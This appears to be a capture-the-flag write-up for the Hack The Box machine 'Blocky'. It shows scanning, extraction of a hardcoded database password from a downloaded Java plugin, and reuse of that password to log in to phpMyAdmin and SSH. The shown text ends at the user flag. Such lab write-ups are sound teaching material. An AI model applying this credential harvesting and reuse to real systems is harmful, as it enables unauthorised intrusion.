┌──(root㉿t0mz)-[/home/kali/ctf/blocky]
└─# ping -c 1 10.10.10.37
PING 10.10.10.37 (10.10.10.37) 56(84) bytes of data.
64 bytes from 10.10.10.37: icmp_seq=1 ttl=63 time=173 ms
--- 10.10.10.37 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 172.733/172.733/172.733/0.000 ms
We can tell this is a Linux machine from the TTL (the reply arrives with TTL 63, a default of 64 minus one hop):
TTL <= 64 >> (Linux)
TTL <= 128 >> (Windows)
1.2 Nmap
┌──(root㉿t0mz)-[/home/kali/ctf/blocky]
└─# nmap -sS -sV -sC -p- -open --min-rate 5000 -Pn -vvv 10.10.10.37 -oN escaneo.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-04 20:02 -03
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:02
Completed NSE at 20:02, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:02
Completed NSE at 20:02, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:02
Completed NSE at 20:02, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 20:02
Completed Parallel DNS resolution of 1 host. at 20:02, 0.02s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:02
Scanning 10.10.10.37 [65535 ports]
Discovered open port 80/tcp on 10.10.10.37
Discovered open port 22/tcp on 10.10.10.37
Discovered open port 21/tcp on 10.10.10.37
Discovered open port 25565/tcp on 10.10.10.37
Completed SYN Stealth Scan at 20:02, 26.49s elapsed (65535 total ports)
Initiating Service scan at 20:02
Scanning 4 services on 10.10.10.37
Completed Service scan at 20:02, 6.46s elapsed (4 services on 1 host)
NSE: Script scanning 10.10.10.37.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:02
Completed NSE at 20:03, 5.22s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:03
Completed NSE at 20:03, 1.27s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:03
Completed NSE at 20:03, 0.00s elapsed
Nmap scan report for 10.10.10.37
Host is up, received user-set (0.18s latency).
Scanned at 2025-03-04 20:02:25 -03 for 40s
Not shown: 65530 filtered tcp ports (no-response), 1 closed tcp port (reset)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63 ProFTPD 1.3.5a
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDXqVh031OUgTdcXsDwffHKL6T9f1GfJ1/x/b/dywX42sDZ5m1Hz46bKmbnWa0YD3LSRkStJDtyNXptzmEp31Fs2DUndVKui3LCcyKXY6FSVWp9ZDBzlW3aY8qa+y339OS3gp3aq277zYDnnA62U7rIltYp91u5VPBKi3DITVaSgzA8mcpHRr30e3cEGaLCxty58U2/lyCnx3I0Lh5rEbipQ1G7Cr6NMgmGtW6LrlJRQiWA1OK2/tDZbLhwtkjB82pjI/0T2gpA/vlZJH0elbMXW40Et6bOs2oK/V2bVozpoRyoQuts8zcRmCViVs8B3p7T1Qh/Z+7Ki91vgicfy4fl
| 256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNgEpgEZGGbtm5suOAio9ut2hOQYLN39Uhni8i4E/Wdir1gHxDCLMoNPQXDOnEUO1QQVbioUUMgFRAXYLhilNF8=
| 256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILqVrP5vDD4MdQ2v3ozqDPxG1XXZOp5VPpVsFUROL6Vj
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18
|_http-title: Did not follow redirect to http://blocky.htb
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
25565/tcp open minecraft syn-ack ttl 63 Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
Service Info: Host: 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:03
Completed NSE at 20:03, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:03
Completed NSE at 20:03, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:03
Completed NSE at 20:03, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.54 seconds
Raw packets sent: 131083 (5.768MB) | Rcvd: 23 (1.008KB)
We see port 21 (ProFTPD 1.3.5a), an FTP server for file transfer; port 22 (OpenSSH 7.2p2), an SSH server for remote console access; port 80 (Apache httpd 2.4.18), a web server; and, last but not least, port 25565 (Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)), a Minecraft server for version 1.11.2.
1.3 whatweb
Before running the whatweb scan to see the web technologies in use, we make the domain "http://blocky.htb/" point to the Hack The Box machine's IP (10.10.10.37) by editing "/etc/hosts":
┌──(root㉿t0mz)-[/home/kali/ctf/blocky]
└─# nvim /etc/hosts
┌──(root㉿t0mz)-[/home/kali/ctf/blocky]
└─# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 t0mz
# HACK THE BOX
10.10.10.37 blocky.htb
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
┌──(root㉿t0mz)-[/home/kali/ctf/blocky]
└─#
Let's open the website hosted on port 80 in Firefox using that domain:
Now we run the whatweb scan against the domain "http://blocky.htb/":
Since the site is built with the WordPress CMS, version 4.8, we use the WordPress scanner "wpscan" with the following command:
❯ wpscan --url http://blocky.htb/ -e p --plugins-detection aggressive
WordPress Security Scanner by the WPScan Team
Version 3.8.27
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://blocky.htb/ [10.10.10.37]
[+] Started: Tue Mar 4 23:05:14 2025
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://blocky.htb/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://blocky.htb/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://blocky.htb/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://blocky.htb/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.8 identified (Insecure, released on 2017-06-08).
| Found By: Rss Generator (Passive Detection)
| - http://blocky.htb/index.php/feed/, <generator>https://wordpress.org/?v=4.8</generator>
| - http://blocky.htb/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.8</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://blocky.htb/wp-content/themes/twentyseventeen/
| Last Updated: 2024-11-12T00:00:00.000Z
| Readme: http://blocky.htb/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 3.8
| Style URL: http://blocky.htb/wp-content/themes/twentyseventeen/style.css?ver=4.8
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://blocky.htb/wp-content/themes/twentyseventeen/style.css?ver=4.8, Match: 'Version: 1.3'
[+] Enumerating Most Popular Plugins (via Aggressive Methods)
Checking Known Locations - Time: 00:00:54 <====================================================================================================> (1500 / 1500) 100.00% Time: 00:00:54
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] akismet
| Location: http://blocky.htb/wp-content/plugins/akismet/
| Last Updated: 2025-02-14T18:49:00.000Z
| Readme: http://blocky.htb/wp-content/plugins/akismet/readme.txt
| [!] The version is out of date, the latest version is 5.3.7
|
| Found By: Known Locations (Aggressive Detection)
| - http://blocky.htb/wp-content/plugins/akismet/, status: 200
|
| Version: 3.3.2 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://blocky.htb/wp-content/plugins/akismet/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://blocky.htb/wp-content/plugins/akismet/readme.txt
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue Mar 4 23:06:23 2025
[+] Requests Done: 1553
[+] Cached Requests: 7
[+] Data Sent: 411.154 KB
[+] Data Received: 22.418 MB
[+] Memory used: 253.656 MB
[+] Elapsed time: 00:01:08
We see a plugin called "akismet" in version 3.3.2. Next we fuzz the site's directories with wfuzz:
❯ wfuzz -c --hc 404 -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://blocky.htb/FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://blocky.htb/FUZZ
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000014: 200 313 L 3592 W 52224 Ch "http://blocky.htb/"
000000012: 200 313 L 3592 W 52224 Ch "# on atleast 2 different hosts"
000000003: 200 313 L 3592 W 52224 Ch "# Copyright 2007 James Fisher"
000000007: 200 313 L 3592 W 52224 Ch "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"
000000013: 200 313 L 3592 W 52224 Ch "#"
000000011: 200 313 L 3592 W 52224 Ch "# Priority ordered case sensative list, where entries were found"
000000241: 301 9 L 28 W 313 Ch "wp-content"
000000009: 200 313 L 3592 W 52224 Ch "# Suite 300, San Francisco, California, 94105, USA."
000000010: 200 313 L 3592 W 52224 Ch "#"
000000006: 200 313 L 3592 W 52224 Ch "# Attribution-Share Alike 3.0 License. To view a copy of this"
000000002: 200 313 L 3592 W 52224 Ch "#"
000000005: 200 313 L 3592 W 52224 Ch "# This work is licensed under the Creative Commons"
000000008: 200 313 L 3592 W 52224 Ch "# or send a letter to Creative Commons, 171 Second Street,"
000000004: 200 313 L 3592 W 52224 Ch "#"
000000001: 200 313 L 3592 W 52224 Ch "# directory-list-2.3-medium.txt"
000000519: 301 9 L 28 W 310 Ch "plugins"
000000786: 301 9 L 28 W 314 Ch "wp-includes"
000001073: 301 9 L 28 W 313 Ch "javascript"
000000190: 301 9 L 28 W 307 Ch "wiki"
000010825: 301 9 L 28 W 313 Ch "phpmyadmin"
000007180: 301 9 L 28 W 311 Ch "wp-admin"
000045240: 200 313 L 3592 W 52224 Ch "http://blocky.htb/"
000095524: 403 11 L 32 W 298 Ch "server-status"
Total time: 349.7403
Processed Requests: 220560
Filtered Requests: 220537
Requests/sec.: 630.6392
We see interesting directories, such as "plugins" and "phpmyadmin"; looking at the page source, phpmyadmin is version 4.5.4.
2- Exploitation
2.1 BlockyCore.jar
Let's go to the URL "http://blocky.htb/plugins", a directory found while fuzzing the website:
We see 2 plugins; the one of interest is "BlockyCore.jar", so we download it by clicking on it:
❯ ls -la
drwxrwxr-x t0mz t0mz 4.0 KB Tue Mar 4 23:26:15 2025 .
drwxrwxr-x t0mz t0mz 4.0 KB Tue Mar 4 22:46:58 2025 ..
.rwxrwxrwx t0mz t0mz 883 B Tue Mar 4 23:25:31 2025 BlockyCore.jar
.rw-rw-r-- t0mz t0mz 2.1 KB Tue Mar 4 22:48:50 2025 escaneo.txt
.rw-rw-r-- t0mz t0mz 263 B Tue Mar 4 22:55:33 2025 ping.txt
.rw-rw-r-- t0mz t0mz 964 B Tue Mar 4 22:54:49 2025 whatweb.txt
Let's extract it with 7-Zip on GNU/Linux (a .jar is just a ZIP archive), using the command "7z x BlockyCore.jar":
❯ 7z x BlockyCore.jar
7-Zip 24.09 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-11-29
64-bit locale=C.UTF-8 Threads:128 OPEN_MAX:1024, ASM
Scanning the drive for archives:
1 file, 883 bytes (1 KiB)
Extracting archive: BlockyCore.jar
--
Path = BlockyCore.jar
Type = zip
Physical Size = 883
Everything is Ok
Files: 2
Size: 964
Compressed: 883
❯ ls
com META-INF BlockyCore.jar
Let's go into the "com" directory extracted above and list its contents:
❯ cd com
❯ ls
myfirstplugin
We go into the "myfirstplugin" directory:
❯ cd myfirstplugin
❯ ls
BlockyCore.class
Let's run "strings" on "BlockyCore.class", since we can't simply "cat" it: it is a compiled Java class (bytecode), not a text file:
❯ strings BlockyCore.class
com/myfirstplugin/BlockyCore
java/lang/Object
sqlHost
Ljava/lang/String;
sqlUser
sqlPass
<init>
Code
localhost
root
8YsqfCTnvxAUeduzjNSXe22
LineNumberTable
LocalVariableTable
this
Lcom/myfirstplugin/BlockyCore;
onServerStart
onServerStop
onPlayerJoin
TODO get username
!Welcome to the BlockyCraft!!!!!!!
sendMessage
'(Ljava/lang/String;Ljava/lang/String;)V
username
message
SourceFile
BlockyCore.java
By common sense, these look like credentials:
root
8YsqfCTnvxAUeduzjNSXe22
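Why those two values stand out among everything else strings prints: javac stores every "..." literal from the source as a CONSTANT_String entry in the class constant pool, separate from the Utf8 entries that hold identifiers and type descriptors. The following Python scanner (an added example, not code from the writeup) walks the constant pool and returns only the string literals, which is the check a build pipeline can run over its own jars to catch hardcoded secrets before they ship; the class bytes it parses are constructed inline to mimic BlockyCore.class and are not the real file.

```python
import struct

# Fixed payload size (bytes) of each constant-pool tag; Utf8 (tag 1) is variable.
CP_SIZES = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4,
            12: 4, 15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}

def string_literals(data: bytes) -> list[str]:
    """Return the CONSTANT_String literals of a .class file in pool order,
    skipping the plain Utf8 entries used for identifiers and descriptors."""
    if data[:4] != b"\xca\xfe\xba\xbe":
        raise ValueError("not a Java class file")
    count = struct.unpack(">H", data[8:10])[0]  # constant_pool_count
    pos, idx = 10, 1                             # pool entries are 1-indexed
    utf8, string_refs = {}, []
    while idx < count:
        tag = data[pos]
        pos += 1
        if tag == 1:    # CONSTANT_Utf8: u2 length followed by the bytes
            n = struct.unpack(">H", data[pos:pos + 2])[0]
            utf8[idx] = data[pos + 2:pos + 2 + n].decode("utf-8", "replace")
            pos += 2 + n
        elif tag == 8:  # CONSTANT_String: u2 index of the Utf8 entry it refers to
            string_refs.append(struct.unpack(">H", data[pos:pos + 2])[0])
            pos += 2
        else:
            pos += CP_SIZES[tag]
        idx += 2 if tag in (5, 6) else 1  # Long and Double occupy two slots
    return [utf8[i] for i in string_refs]

def build_sample_class() -> bytes:
    """Constructed stand-in for BlockyCore.class (not the real file): a header
    plus a constant pool shaped like what javac emits for the fields above."""
    pool = [(1, b"sqlUser"), (1, b"sqlPass"), (1, b"Ljava/lang/String;"),   # 1-3
            (1, b"localhost"), (1, b"root"), (1, b"8YsqfCTnvxAUeduzjNSXe22"),  # 4-6
            (8, 4), (8, 5), (8, 6),   # 7-9: String constants pointing at 4, 5, 6
            (5, 0),                   # 10-11: a Long, to exercise the two-slot rule
            (1, b"onServerStart")]    # 12
    out = bytearray(b"\xca\xfe\xba\xbe" + struct.pack(">HH", 0, 52))
    out += struct.pack(">H", 1 + sum(2 if t in (5, 6) else 1 for t, _ in pool))
    for tag, val in pool:
        out.append(tag)
        if tag == 1:
            out += struct.pack(">H", len(val)) + val
        elif tag == 8:
            out += struct.pack(">H", val)
        else:  # tag 5 (Long): 8-byte big-endian value
            out += struct.pack(">q", val)
    return bytes(out)
```

Running string_literals(build_sample_class()) yields only localhost, root and the password, while sqlUser, sqlPass and the descriptors are filtered out; on a real jar, unzip it and feed each .class file to the same function.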
If we recall, we found the "phpmyadmin" directory, a PHP web application for database administration; let's try these credentials in the "phpmyadmin" login at "http://blocky.htb/phpmyadmin":
It logs us in successfully:
2.2 Intrusion via SSH
We now have a password that we could use to log in via SSH; what we still need is a system username. For that, we look at the WordPress database inside "phpmyadmin", specifically the "wp_users" table:
We see a user called "notch", so we log in with that user, and the credentials end up as follows:
User: notch
Password: 8YsqfCTnvxAUeduzjNSXe22
We log in via SSH:
❯ ssh notch@10.10.10.37
The authenticity of host '10.10.10.37 (10.10.10.37)' can't be established.
ED25519 key fingerprint is SHA256:ZspC3hwRDEmd09Mn/ZlgKwCv8I8KDhl9Rt2Us0fZ0/8.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:8: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.37' (ED25519) to the list of known hosts.
notch@10.10.10.37's password:
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
7 packages can be updated.
7 updates are security updates.
Last login: Fri Jul 8 07:16:08 2022 from 10.10.14.29
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
notch@Blocky:~$
2.3 Getting the user flag
The user flag is in the home directory of the user "notch"; listing the directory right after logging in via SSH:
notch@Blocky:~$ ls
minecraft user.txt
notch@Blocky:~$
There is the user.txt flag; let's display it with cat: